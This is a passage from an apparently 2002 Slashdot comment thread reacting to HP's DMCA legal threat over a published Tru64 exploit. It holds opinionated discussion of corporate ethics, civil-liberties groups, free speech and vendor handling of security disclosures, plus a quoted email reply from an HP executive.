    You know it is possible -- and ethical! -- to not do something because it goes too far. Or is HP obligated to murder someone if it increases shareholder profit? And before you say, "Well, the law imposes too high a cost", answer me this: What if you could prove the legal sanction was less than the profit realized? Should HP kill the person? Must they?


    You know, in many ways, you're right. In so very many ways, the original poster is also right.

    There are companies out there that don't worry about things like increasing shareholder wealth- many of those are privately held companies. There are also a lot of companies that seem to be much more concerned with the short-term stock market valuations, etc. and will do anything to "improve" their valuations short-term, including mass-layoffs, cooking the books, screwing the people of an entire state over to make their bottom line look better, etc. While it's not 100% true, there IS a reason why a lot of people think that companies solely exist to increase shareholder wealth.
    --
    I am not merely a "consumer" or a "taxpayer". I am a Citizen of the State of Texas
  95. Answer of Mr. Ferson by trizzer · · Score: 2, Informative

    Well at least u get an answer if u write to him (could be an automatic reply tho cause his mailbox has been spammed by the /. crowd ;)

    --- schnipp ---

    Dirk,

    Appreciate your note and concern. Let me just start by saying, "don't
    believe everything you read in the press :-)". I can assure you that my
    primary interest and concern is for the Tru64 customers and that the
    Tru64 engineering team is committed to finding and fixing any security
    problem in the product and getting these fixes/notifications out to
    customers ASAP. Trying to do everything possible for Tru64
    customers is what motivates and brings me to work every day
    (and night :-). We also encourage our customers and 3rd parties
    that find security issues in the product to coordinate through the
    CERT process, which has been set up to support both product
    vendors and customers. Again, I appreciate your concern and
    feedback.

    Kent ...

    -----Original Message-----
    From: Dirk Lenneffer [mailto:*********.com]
    Sent: Tuesday, July 30, 2002 11:42 PM
    To: Ferson, Kent
    Subject: TRUE64 exploit

    dear mr. ferson,

    instead of threatening the people who do YOUR work of finding bugs in
    your product you should simply thank them, fix the bug and move along.
    this last act of yours doesn't give us as customers great confidence in
    your way of handling security related issues within your products.

    best regards

    --- schnapp ---

    --
    ___________ LOAD"$",8,1
  96. Well, maybe not the ACLU... by El+Camino+SS · · Score: 3, Informative

    The EFF I respect. I understand their issues, and the fact that we are totally under assault by corporations who want to chop up the digital world and sell it to us at as much as we can possibly afford to pay. Digital "Coal Towns" (look it up if you want to see some of America's greatest corporate crimes against humanity in the past).

    As a member of the media, and a person that touches base with the ACLU every few weeks, I'll say that the ACLU is no longer interested in civil liberties, but more interested in legislating this society to a direction that they would prefer us to act. Trying to modify behavior through legislation is very different than protecting the right for us to act the way WE WANT TO ACT.

    As of late, they seem to be only interested in anyone else but a person interested in computers. After talking with me several times face to face, the local rep of the ACLU has pretty much explained about their crusade against private Christian schools (please note the stressing of private) and their deemed "objectionable behavior" by those schools, and active interest in what goes on inside those schools. Those activities are rather curious for an organization like the ACLU, are they not?

    After talking to them about these subjects, I would never, EVER give them another dollar. They appear to represent the civil liberties of only SOME AMERICANS. OF COURSE, before I get slapped back, I would like to repeat this... imho, IMHO, IMHO!

    So as a member in good standing of the /. crowd, I'd like to say let's stick to what we are specifically interested with on this board... and not give money to people who would love to "engineer through legislation" a power struggle at the expense of some Americans over other Americans.

    This is a call to not listen to the ACLU. For computer issues, please stick your money to the EFF. The ACLU has gotten batty in its old age, and is trying to change the way we think, which the last time I checked, is a CIVIL LIBERTY.

    1. Re:Well, maybe not the ACLU... by ichimunki · · Score: 2

      What a bizarre diatribe. All of the communications I've gotten from the ACLU centered on things like religious issues in *public* schools, library internet filtering, due process, equal protection, overall lessening of civil liberty through vehicles like USA-PATRIOT, and the drug war.

      IN FACT: just last week the ACLU filed a lawsuit against the DMCA (http://www.aclu.org/news/2002/n072502a.html). So your criticism of their supposed inaction on this front is totally offbase. Sheesh!

      That your rant got modded up is even further cause for alarm.

      --
      I do not have a signature
  97. Re:HP has a wonderful opportunity here actually by HiThere · · Score: 2

    If they don't do something to redeem themselves, then I, personally, have had it with all HP and Compaq products. I won't trust a company that won't allow people to criticize it. And I am quite reluctant to ever trust a company that has ever threatened people who criticized it.

    If they want to redeem themselves, they have three choices:
    1) totally distance themselves from the cretin who issued that letter. He's a high manager, so this probably means firing for cause and without recommendation. Management is supposed to be responsible for policy, and by keeping him, or even not punishing him harshly, they are continuing an association with that policy.

    2) lead a crusade to dismantle the DMCA. You can make a case that a company must live within the current laws, but if you do you must accept the responsibility for the moral character of those laws. Considering HP's position at the top of several industries, they would need to take a major role in improving the laws... and not just for themselves!

    3) come up with clear and convincing proof that that was the only way out of a situation that endangered ME without unacceptable costs. Proving that this was protection for themselves cuts no ice with me. If they want to say "we had to do ", then they had better be willing to show that it was for the common good of the community if they wish to be considered community members. Even then, it had better be a really good reason.

    There may be another choice, but I sure don't see it.

    I still assess Intel a 10% advantage penalty for their criminal prosecution of a sysadmin, and for their participation in a scheme involving encrypting the signals being transmitted to monitors. So far I haven't regretted choosing AMD, either. And I doubt that I'd regret choosing another company to buy my printers and ink from.

    --

    I think we've pushed this "anyone can grow up to be president" thing too far.
  98. Re:Dear HP (The Real Thing) by T3kno · · Score: 2

    Yeah, I realized that after I looked at the preview on /. Oh well, hopefully she'll understand.

    --
    (B) + (D) + (B) + (D) = (K) + (&)
  99. Re:HP has a wonderful opportunity here actually by WNight · · Score: 2

    Try Canon. They not only make good printers but they aren't dicks about ink. Their printers have separate ink cartridges (well, their $60 model may not, but everything I've seen does) and they make it easy to refill them yourself.

    This says a lot in the age of companies chipping their cartridges to prevent refilling, "for your own good." (And threatening to sue people who bypass, or describe how to bypass, the protection.)

    Really, I'm too lazy to refill my own cartridges, but I won't *ever* go with someone who makes it impossible. It's a freedom thing. And this way there's a second source, if I ever need it.

    I wrote Canon an email explaining why all of my future purchases (and recommendations) would be for their products, based on their current policies.

  100. Re:The EU by Lemmy+Caution · · Score: 2
    I'll admit I was being hyperbolic in the name of literary license, but the primary place I'll take issue with you here is your distinction between civil and criminal law. We don't live in states, we live in societies, and the fact that private parties can avail themselves of statutes which allow them to squelch the speech of others makes this a less free society, even though no constitutional violation has occurred.

    The limitations on depictions of sex between minors was, of course, from legislation that hasn't passed, but we're one hysteria away from having that happen.

    The 2600 case is a case in which just linking to a copyright-protection-violating description was prohibited. Again, the civil/criminal distinction is irrelevant from the perspective of the effect on free speech.

    And as far as the drug-speech goes, check out the rider of HR833 (section 1701), making it a crime punishable by up to 10 years in federal prison to teach, demonstrate or distribute information on the manufacture or use of illegal drugs.

  101. Not above the law as long as the DMCA exists! by sfgoth · · Score: 2

    Today, top company executives seem to be above the law.

    The HP VP droid who did this is not acting above the law. He is using the law exactly as intended!

    We need to get the law removed, not convince a bunch of corporations that they shouldn't use it!

    -pmb

  102. Re:The EU by Lemmy+Caution · · Score: 2
    If you lose your livelihood, you've lost some freedom already. After all, it is a remedy in criminal cases as well that one be fined.

    Essentially, you are relying on the justice system to defy the anti-freedom populist sentiment in the US. I don't think they will. The last decision of principle - roundly condemned by both parties and most of the press, yet the only reasonably constitutional decision that any objective judges could come to - was the "under God" decision by the 9th US court of appeals. The fact that it's going to be overturned by the SCOTUS will demonstrate that the judiciary is not going to protect the constitution any more.

  103. Re:The EU by Lemmy+Caution · · Score: 2

    The first statement was a bon mot, not a serious analysis of freedom of speech in the US. It was attached to the ridiculous, almost meaningless and oft-recited cliche that the US is the freest society in the world (incarceration rates alone should at least problematize that claim). As far as the "under God" bit goes, though, I can't understand how any objective observer could see it as constitutional. It so clearly mandates a monotheistic doctrine, and makes that doctrine essential to national unity. (While students were excused from saying the pledge, teachers were not - which meant that a public institution was requiring them to lead the pledge, or lose their jobs. This is clearly a violation of the spirit of not allowing the state to respect the establishment of religion - and of course, just as at one time states may have established churches, states also violated the nature of the constitution by maintaining slavery for decades. That's irrelevant. And if those states had mandated compulsory membership in those state churches for employees, that too, I think, would be seen as explicitly unconstitutional.) Many of us who do advocate the ongoing separation between church and state are unhappy with the timing of the decision - it's not a battle that is best fought now, with patriotic fervor still at high levels, and it's a pyrrhic victory - but let's face it, the 9th Court of Appeals had the case in their docket and had to rule on it.

  104. Re:The EU by Lemmy+Caution · · Score: 2
    You probably didn't know I'm of Peruvian origins when you wrote this, but I'll say this: in many ways, Peru *is* freer than the US. You actually have less de facto interference and hassle from a variety of perspectives, from speech to day-to-day running of business to how you dispense with your property to the use of substances. Of course, there's also poverty in Peru.

    Economic freedom isn't even addressed in the constitution, really. The fact is that the 'economic freedom' as experienced in the US has more to do with the options that prosperity creates than with anything else.

    And you did an unusual flip-flop. On one hand, you cite economic freedom as a demonstration of the relative freedom of the US, but farther up the thread you had said that the civil penalties against speech are not as significant as loss of freedom. On one hand you avail yourself of an economic argument for freedom, on the other you abandon that for a discursive/civil one.

  105. Re:Did the hackers give HP fair notice? by snosoft · · Score: 2, Informative

    "http://www.netsys.com/cgi-bin/display_news_article.cgi?338"

  106. On the matter of intent by tlambert · · Score: 2

    Intent is always a factor in any criminal or legal proceeding. Intent is very important in deciding a case, because intent determines the purpose for the act in question, rather than the result.

    Considering only the ends means you ignore the means, and the means may in fact be unconscionable, or even reprehensible.

    The indirectness of the gain is immaterial to the fact that the motivation was gain.

    Gain is not a *bad* reason, but it's not a reason which renders the act defensible, from a legal or moral standpoint.

    Motivation speaks to ethicality of the action. If the motivation was base, then that's very different than if it had been principled.

    -- Terry

  107. Of course they won't call you. by Hektor_Troy · · Score: 2

    When you go out of your way to call you, from Denmark no less, you do what everyone I talk to do ... "well, I haven't had time to take a shower today, and I want to do that" ...

    Maybe it's just me ... ;-)

    --
    We do not live in the 21st century. We live in the 20 second century.
  108. Re:as a Tru64 admin... [CONTINUED] by Corgha · · Score: 2

    bleh... hit submit instead of preview.

    anyway, as I was saying:

    The fact that they are threatening legal action implies two things: They see this as a real threat; they prefer to suppress word of vulnerabilities rather than fix them.

    The latter is not the sort of response I want from a vendor. It's especially grating when, in the past few days, Debian and RedHat, for instance, have responded promptly to every issue posted on BugTraq.